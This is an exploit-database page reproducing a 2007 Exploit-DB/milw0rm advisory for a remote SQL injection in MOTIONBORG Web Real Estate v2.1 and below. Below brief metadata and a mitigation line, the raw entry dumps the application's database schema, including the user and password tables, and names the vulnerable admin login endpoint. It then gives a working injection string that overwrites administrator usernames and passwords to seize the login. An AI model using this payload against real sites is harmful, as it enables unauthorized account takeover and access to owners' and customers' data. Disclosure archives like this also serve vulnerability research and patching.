MOTIONBORG Web Real Estate - exploit.company

vendor:

Web Real Estate

by:

ajann

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Web Real Estate

Affected Version From: v2.1 and below

Affected Version To: v2.1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

MOTIONBORG Web Real Estate <= v2.1 Remote SQL Injection Vulnerability

The MOTIONBORG Web Real Estate version 2.1 and below is vulnerable to remote SQL injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands and gain unauthorized access to the database.

Mitigation:

Upgrade to the latest version of MOTIONBORG Web Real Estate to fix the vulnerability. Avoid using user-supplied input directly in SQL queries.

Source

Exploit-DB raw data:

******************************************************************************
# Title   :  MOTIONBORG Web Real Estate <= v2.1 Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://www.motionborg.com
# $$      :  Unlimited Agents-> $1,475.00

*******************************************************************************

ajann SQL Injector Beta=>

Script Tables & Columns

[[-dtproperties-]]
id
objectid
property
value
uvalue
lvalue
version
[[-Events-]]
EventId
EventDay
EventStartDate
EventEndDate
EventName
EventDesc
EventIngUrl
EventStatus
[[-MailingList-]]
RecordID
FullName
Phone
Email
Removed
[[-Pole-]]
Record_id
Question
Choice1
Choice2
Choice3
Choice4
Choice5
Result1
Result2
Result3
Result4
Result5
IntranetStart
IntranetEnd
PoleStart
PoleEnd
[[-Poll_Det-]]
RecordId
HdrId
ChoiceEnglish
ChoiceSpanish
ChoiceOrder
ChoiceCount
[[-Poll_Hdr-]]
RecordId
PollId
english_question
spanish_question
startdate
enddate
[[-tblListings-]]
Listing_ID
Date_stamp
Listing_title
Listing
User_ID
Seller
SellerPhone
Seller_email
Address1
Address2
City
County
State
Zip
Country
Status
Transaction
Type
PropertyIconImage
PropertyImages
PropertyImages2
PropertyImages3
PropertyImages4
PropertyImages5
PropertyImages6
PropertyImages7
PropertyImages8
PropertyImages9
PropertyImages10
PropertyFloorPlanImages
Price
Story
StoryType
Bedroom
Bathroom
BathroomHalf
CarGarage
CarGarageHalf
CarGarageAutoDoorOpener
Extras
AdjSquarefeet
LivSquarefeet
ExtrasDescription
DetailDescription
[[-tblSearchConfiguration-]]
Comment_ID
Listing_ID
Name
Country
EMail
Date_stamp
Comments
[[-tblSiteConfiguration-]]
Username
Password
SearchDescription
SearchKeyboards
SiteIntroMediaStatus
SiteIntroMedia
SiteTitle
SiteSlogan
SiteLogoStatus
SiteLogo
SiteVisitsCounterCode
LoanAppStatus
WelcomeMessage
OwnerName
OwnerMessage
OwnerImage
ContactMessage
ContactEmail
ContactPhone
AboutCompany
OportunitiesStatus
Oportunities
UsefullLinksStatus
UsefullLinks
SchoolSearch
IDXstatus
IDXAgentID
IDXSearchURL
ExtAppStatus01
ExtAppStatus02
ExtAppStatus03
ExtAppStatus04
ExtAppStatus05
ExtAppTit01
ExtAppTit02
ExtAppTit03
ExtAppTit04
ExtAppTit05
ExtApp01
ExtApp02
ExtApp03
ExtApp04
ExtApp05
IDXSearchURLExtApp05
site_bg_color
site_text_color
site_text_type
site_links_color
site_visited_links_color
site_active_links_color
site_table_color
site_table_border_color
site_table_title_color
No_records_per_page
[[-tblUsers-]]
User_ID
Username
Password
Name
LastName
User_email
Phone
UserImage
User_code
Active
AdminRights
[[-Users-]]
ID
U_name
U_pass
Fname
Lname

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//admin_check_user.asp (POST Method) [SQL]

Example:

//Find The UserName and Write-> ';update tblUsers set Password='kro';update tblUsers set Username='kro'--
// Password is empty.

Login "kro" | "kro"

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-09]